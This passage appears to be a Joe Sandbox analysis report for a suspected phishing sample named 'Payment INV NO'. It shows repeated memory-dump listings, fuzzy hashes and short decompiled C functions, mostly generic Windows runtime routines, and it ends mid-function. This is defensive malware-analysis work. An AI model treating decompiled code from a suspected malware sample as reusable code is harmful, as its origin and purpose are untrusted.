                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 332a9226ea0eecab25739e2eede206a0329d308669b7e35bde80d9c132365ba4
                                                          • Instruction ID: 2d07e637fea9f4dbf8a7df15aa1ef00c9f4200daa2e3e6157da5963e8d581377
                                                          • Opcode Fuzzy Hash: 332a9226ea0eecab25739e2eede206a0329d308669b7e35bde80d9c132365ba4
                                                          • Instruction Fuzzy Hash: A5C08C3A2209828FCF06CB3CC2E0B947BE0FB90680FC508D0D801CBB22D218D402CA00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179AD30 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179AD30(signed char _a4) {

				return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                          0x0179ad49

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cf6e76b7d8bb56ae19881d1915ad52fe9f628a9505cf267a478251d80f5cf8a
                                                          • Instruction ID: 2d3a095fa39be209fb4f2bf2abda052010400620f2cbe08607fb6ce1384c26a4
                                                          • Opcode Fuzzy Hash: 7cf6e76b7d8bb56ae19881d1915ad52fe9f628a9505cf267a478251d80f5cf8a
                                                          • Instruction Fuzzy Hash: 96C08C32080288BBC7126A45CD40F01BB29E7A0B60F000020B6040A6A18A32E860D588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B3A1C Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017B3A1C(intOrPtr _a4) {
				void* _t5;

				return E017B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                          0x017b3a35

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction ID: 6821d28e6f0d072f938d5f3aac1d32f8226b9642afcf38e95623aae74eea36e8
                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction Fuzzy Hash: 82C08C32080248BBC7126E41DC00F01BB29E7A0B60F000020B6050A5618632EC60D588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A76E2 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A76E2(signed char __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                          0x017a76e4
                                                          0x00000000
                                                          0x017a76f8
                                                          0x017a76fd

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68be7bd2db1b3a264087337463bf734b63cd65954f613599d3f03bdee119c7d4
                                                          • Instruction ID: 63fbb719b137a56e4d1e60d4106cee2b44b34f7f78768d349aca8b9b4de4c314
                                                          • Opcode Fuzzy Hash: 68be7bd2db1b3a264087337463bf734b63cd65954f613599d3f03bdee119c7d4
                                                          • Instruction Fuzzy Hash: FCC08C721411C05AEB2E570CCE24B20BA50AB88708F88029CAA010D4E2C36AA802C208
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C4190 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C4190() {

				if(E017B7D50() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x14));
				} else {
					return  *0x7ffe02d0;
				}
			}



                                                          0x017c4197
                                                          0x0180641c
                                                          0x017c419d
                                                          0x017c41a2
                                                          0x017c41a2

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bd55e9149c7c86c6863013d4338a887bec342d8263ee41d78fa4a2f1523eac5
                                                          • Instruction ID: 740f93ee37e9a205a0449689984c56b7d3c670436c5619045a58b922bda24a50
                                                          • Opcode Fuzzy Hash: 9bd55e9149c7c86c6863013d4338a887bec342d8263ee41d78fa4a2f1523eac5
                                                          • Instruction Fuzzy Hash: 08C04C357119418FCF16CB29C6C4F5577E4B744744F150890E805CB765E724E950CA10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B7D50 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                          0x017b7d56
                                                          0x017b7d5b
                                                          0x017b7d60
                                                          0x017b7d5d
                                                          0x017b7d5d
                                                          0x017b7d5d

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction ID: 25f390b163f48334d4b3dc7e9070029aae880a1e666ce0e723d6e72e051a0af3
                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction Fuzzy Hash: 1EB092353019408FCF1ADF18C080B5573E4BB84A80B8400D4E400CBA21D329E8408900
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1649 17c645b-17c64a1 call 17dfa60 1652 1807c07-1807c0c 1649->1652 1653 17c64a7-17c64aa 1649->1653 1654 1807bf4-1807bf7 1653->1654 1655 17c64b0-17c64ba 1653->1655 1656 1807c00 1654->1656 1657 1807bf9 1654->1657 1658 17c64bc-17c64be 1655->1658 1659 17c64c0-17c6507 1655->1659 1656->1652 1657->1656 1658->1659 1660 17c653c-17c653f 1658->1660 1661 17c6509-17c6524 RtlDebugPrintTimes 1659->1661 1662 17c6526-17c6539 call 17db640 1659->1662 1660->1659 1664 17c6545-17c6549 1660->1664 1661->1662 1664->1659 1667 17c654f-17c658d call 17b2280 call 17affb0 1664->1667 1667->1659
                                                          C-Code - Quality: 26%
                                                          			E017C645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x188d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E017DFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E017B2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E017AFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
